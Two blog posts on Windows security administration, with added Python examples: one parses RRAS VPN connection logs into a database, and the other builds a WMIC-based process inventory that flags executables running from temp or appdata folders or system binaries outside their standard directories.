First and foremost, Windows Servers typically log RRAS connections to %windir%\system32\logfiles and in my case, the files were called in12??.log (in1201.log, in1202.log, etc... presumably the 12 is the year and the ?? is the log file number).<br />
<br />
Secondly, the format for RRAS logs is multi-line, which is something of an irritation but can be worked around using find and piping the output.<br />
<br />
In the case I was reviewing, the client had Server 2003 using Windows Authentication. Your case may be different and this may be a good starting point.<br />
<br />
Running the following find command against the logs extracts what for this example are the usable portions of information concerning login.<br />
<br />
<div style="color: red;">
find /I "Use Windows Authentication" %windir%\system32\logfiles\in*.log</div>
<br />
The output will look something like this<br />
<span style="color: orange;">"SERVERNAME","RAS",02/14/2012,10:02:14,4,"username",,,"<WAN IP ADDRESS>",,"<LAN IP ADDRESS>", ,"<SERVER IP ADDRESS>",132,,"<SERVER IP ADDRESS>",,132329231734,,5,,1,2,,,0,"311 1 <SERVER IP ADDRESS> 01/26/</span><br />
<span style="color: orange;">2012 13:48:05 123",,,,,1,,,,"204",2,,,,,"275",1,,1,1,"<WAN IP ADDRESS>",,,,,,,,"MS</span><br />
<span style="color: orange;">RASV5.20",311,,"0x00414C4142",4,,"Use Windows authentication for all users",,,,"</span><br />
<span style="color: orange;">MSRAS-0-<REMOTE COMPUTERNAME>","MSRASV5.20" </span><br />
<br />
For those of you not familiar with using the For /f command check out this <a href="http://ss64.com/nt/for_cmd.html" target="_blank">link</a>.<br />
<br />
Now, let's output all that information into a single file which we can use.<br />
<br />
<div style="color: red;">
find /I "Use Windows Authentication" %windir%\system32\logfiles\in*.log >> raslog.output.csv</div>
<br />
Once all of that information is outputted to a single csv file, we can use the information presented, however we will need to extract only the useful parts that we want. It is not helpful to have a csv file with 35 columns of which we need, say 7. No need to re-invent the wheel here, the tokens we want are 1,3,4,6,7,8 and 31.<br />
<br />
Let's go get them. Don't forget to adjust to single %'s if you are not calling this from a batch script.<br />
<br />
<div style="color: red;">
for /f "tokens=1,3,4,6,7,8,31 delims=," %%a in ('find /I "Use Windows authentication" %windir%\system32\logfiles\in*.log') do echo %%a, %%b, %%c, %%d, %%e, %%f, %%g>> raslog.csv</div>
<br />
Wonderful. Some suggestions here would be to use your tool of choice to schedule this as a task and have the output file placed in a location where it can be imported easily into your SQL system, unless you import directly from the RRAS server.<br />
<br />
Now schedule that into a batch script and execute using your scheduled task operator or other task scheduler user. Now we have useful information. Notice in your output file, there are three lines for each connection and one for each disconnection and the most useful line is in this format.<br />
<br />
"SERVER", 02/14/2012, 07:59:44, "username", "WANIP", "Assigned Lan IP", "MSRAS-0-Computername"<br />
<br />
Import that data to a SQL database of your choice, create a front end using <insert web stuff here> and you have usable data which can now be aggregated, sorted and queried. <br />
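<br />
The for /f command above numbers its tokens after collapsing runs of commas, so token 7 is the WAN IP only while the two fields before it stay empty. The following Python example is added here and is not part of the original post; it emulates that behaviour and then parses by real column position instead. The column positions are read off the sample record shown earlier, and the log lines and function names are constructed for illustration.<br />

```python
import csv
from datetime import datetime


def for_f_tokens(line, wanted):
    """Emulate cmd.exe `for /f "delims=,"`: consecutive commas collapse,
    so empty CSV fields vanish and every later token shifts left."""
    tokens = [t for t in line.split(",") if t != ""]
    return [tokens[i - 1] if i <= len(tokens) else "" for i in wanted]


# 0-based column positions taken from the sample record in the post:
# server=1st, date=3rd, time=4th, user=6th, WAN IP=9th, LAN IP=11th field.
COL_SERVER, COL_DATE, COL_TIME, COL_USER, COL_WAN, COL_LAN = 0, 2, 3, 5, 8, 10
CLIENT_PREFIX = "MSRAS-0-"   # prefix of the remote computer name field


def parse_record(line):
    """Return one row ready for database import, or None for non-records."""
    row = next(csv.reader([line], skipinitialspace=True), [])
    if len(row) <= COL_LAN:
        return None                      # e.g. find's "---------- FILE" banner
    try:
        when = datetime.strptime(
            f"{row[COL_DATE]} {row[COL_TIME]}", "%m/%d/%Y %H:%M:%S"
        )
    except ValueError:
        return None                      # not a dated log record
    client = next((f for f in row if f.startswith(CLIENT_PREFIX)), "")
    return {
        "server": row[COL_SERVER],
        "logged_at": when.strftime("%Y-%m-%d %H:%M:%S"),  # MySQL DATETIME form
        "username": row[COL_USER],
        "wan_ip": row[COL_WAN],
        "lan_ip": row[COL_LAN],
        "client": client[len(CLIENT_PREFIX):],
    }


# Constructed records shaped like the sample output in the post.
PLAIN = ('"RRAS01","RAS",02/14/2012,10:02:14,4,"jsmith",,,"203.0.113.7",,'
         '"10.0.0.50",,"10.0.0.1",132,,"10.0.0.1",,"MSRAS-0-LAPTOP7","MSRASV5.20"')
# Same record with the normally empty seventh field populated (constructed).
SHIFTED = PLAIN.replace('"jsmith",,', '"jsmith","corp.example/Users/jsmith",')
BANNER = "---------- C:\\WINDOWS\\SYSTEM32\\LOGFILES\\IN1202.LOG"

if __name__ == "__main__":
    print(for_f_tokens(PLAIN, [6, 7, 8]))     # user, WAN IP, LAN IP
    print(for_f_tokens(SHIFTED, [6, 7, 8]))   # user, extra field, WAN IP
    print(parse_record(SHIFTED))
```

Converting the date to YYYY-MM-DD HH:MM:SS at this stage also lets the database sort and range-query the records without string manipulation.<br />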
<br />
Each scenario and implementation will be different; please feel free to contact me if you would like assistance with your systems. I welcome any comments or improvements, as well as observations of your scenarios.<br />
<br />
<b>Using WMIC To Create SOC Based Inventory of Executables</b><br />
Posted 2012-02-14<br />
<div style="text-align: left;">
</div>
<span style="font-size: x-small;">Written by Frank Angiolelli, CISSP</span> <br />
<span style="font-size: x-small;"><a href="http://www.fortknoxnetworks.com/">www.fortknoxnetworks.com</a></span><br />
<br />
<u>Using WMIC To Create SOC Based Inventory of Executables</u><br />
<br />
As many of us know, <a href="http://technet.microsoft.com/en-us/library/bb742610.aspx">WMIC</a> is an exceptionally powerful tool for collecting information. When coupled with additional tools, a useful and actionable collection of material can be created that provides visibility across an enterprise.<br />
<br />
For example, leveraging WMIC to collect all running processes and inventory that data is an interesting use case. For those of you unfamiliar with wmic, the following command can get you started (Pro versions of Windows only):<br />
<br />
<div style="color: red;">
wmic process list brief /format:list</div>
<br />
The information presented provides HandleCount, Name, Priority, ProcessId, ThreadCount and WorkingSetSize. Interesting information to say the least; however, without the actual paths, usefulness is limited.<br />
By running the following command, we can discover all the information presentable:<br />
<br />
<div style="color: red;">
wmic process list /?</div>
<br />
This is a lot of information, not all of which is usable. For my purposes, I choose the following information: Name, ProcessID and ExecutablePath. The Name will show you the executable, the ProcessID is useful if you need to execute something based on your query, and the ExecutablePath shows you the location of the executable on the system.<br />
<br />
<span style="color: red;">wmic process get name,processid,executablepath</span><br />
<br />
Now as we start to move into useful information, we need to edit formatting and output it to a file that again is useful. This can be achieved using the format and output commands.<br />
<br />
<span style="color: red;">wmic /output:%computername%.csv process get name,processid,executablepath /format:csv</span><br />
<br />
Now we have an output of a file that is useful for our purposes. When looking at the csv file, you will notice that the first column is called "Node" which indicates the computername variable. <br />
<br />
Without going too in depth, this information can be collected, transported or queried from a centralized location and then input into a database engine of your choice. For example, inputting into MySQL can be done with multiple files using a type command for all csv files created/collected and then running something like. I have not used this with all queries run from a single system as of writing of this article, but this seems quite possible.<br />
<br />
[Image not available]<br />
<br />
<br />
Again, in my above case, I've ignored three lines because I'm consolidating multiple queries using a simple type command resulting in the first three lines being garbage.<br />
<br />
Once all the data is consolidated, running a query inside MySQL for key indicators like 'temp' or 'appdata' becomes simple and fast. In addition, an inventory of system executables like csrss.exe or explorer.exe can report any executable not running in standard Windows Directories.<br />
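<br />
The two checks described above (paths containing 'temp' or 'appdata', and system executable names running outside their standard directories) can also be run directly over the consolidated CSV. The following Python example is added here and is not the author's Watchtower code; the sample inventory is constructed, the expected directories assume a default C:\Windows install, and the repeated header rows mimic several wmic /format:csv files joined with type.<br />

```python
import csv
import io
import ntpath

# Key indicators named in the post: anything running from temp or appdata.
SUSPECT_MARKERS = ("\\temp\\", "\\appdata\\")

# Assumption: Windows is installed in the default C:\Windows directory.
EXPECTED_DIRS = {
    "csrss.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows"},
}


def load_inventory(text):
    """Parse concatenated wmic CSV output, skipping blank lines and the
    header row that repeats at the start of every collected file."""
    rows, header = [], None
    for rec in csv.reader(io.StringIO(text)):
        if not rec or not any(field.strip() for field in rec):
            continue
        if rec[0].strip().lower() == "node":
            header = [h.strip().lower() for h in rec]
            continue
        if header is None or len(rec) != len(header):
            continue                      # garbage line between files
        rows.append(dict(zip(header, (f.strip() for f in rec))))
    return rows


def flag_suspicious(rows):
    """Return (node, name, path, reason) for processes worth a second look."""
    findings = []
    for row in rows:
        path = row.get("executablepath", "")
        if not path:
            continue                      # kernel/system entries report no path
        low = path.lower()
        name = row.get("name", "").lower()
        folder = ntpath.dirname(low)
        if any(marker in low for marker in SUSPECT_MARKERS):
            reason = "runs from temp/appdata"
        elif name in EXPECTED_DIRS and folder not in EXPECTED_DIRS[name]:
            reason = "system binary name outside its standard directory"
        else:
            continue
        findings.append((row["node"], row["name"], path, reason))
    return findings


# Constructed sample: two endpoints' output concatenated into one file.
SAMPLE = r"""
Node,ExecutablePath,Name,ProcessId
WS01,C:\Windows\System32\csrss.exe,csrss.exe,412
WS01,C:\Windows\explorer.exe,explorer.exe,2210
WS01,C:\Users\alice\AppData\Local\Temp\upd.exe,upd.exe,3344

Node,ExecutablePath,Name,ProcessId
WS02,C:\Users\bob\Documents\csrss.exe,csrss.exe,5120
WS02,,System,4
"""

if __name__ == "__main__":
    for finding in flag_suspicious(load_inventory(SAMPLE)):
        print(finding)
```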
<br />
Building a front end on the system allows for access, queries and reporting based on standardized queries on a daily basis. Build a python based email reporting system and your system is now alerting you to suspicious executables on a daily basis.<br />
<br />
In my Watchtower product I have taken this to extremes building transport, consolidation, reporting and front end systems with email reports daily to account for inventories of processes, startup tasks and services captured from multiple endpoints on a daily basis.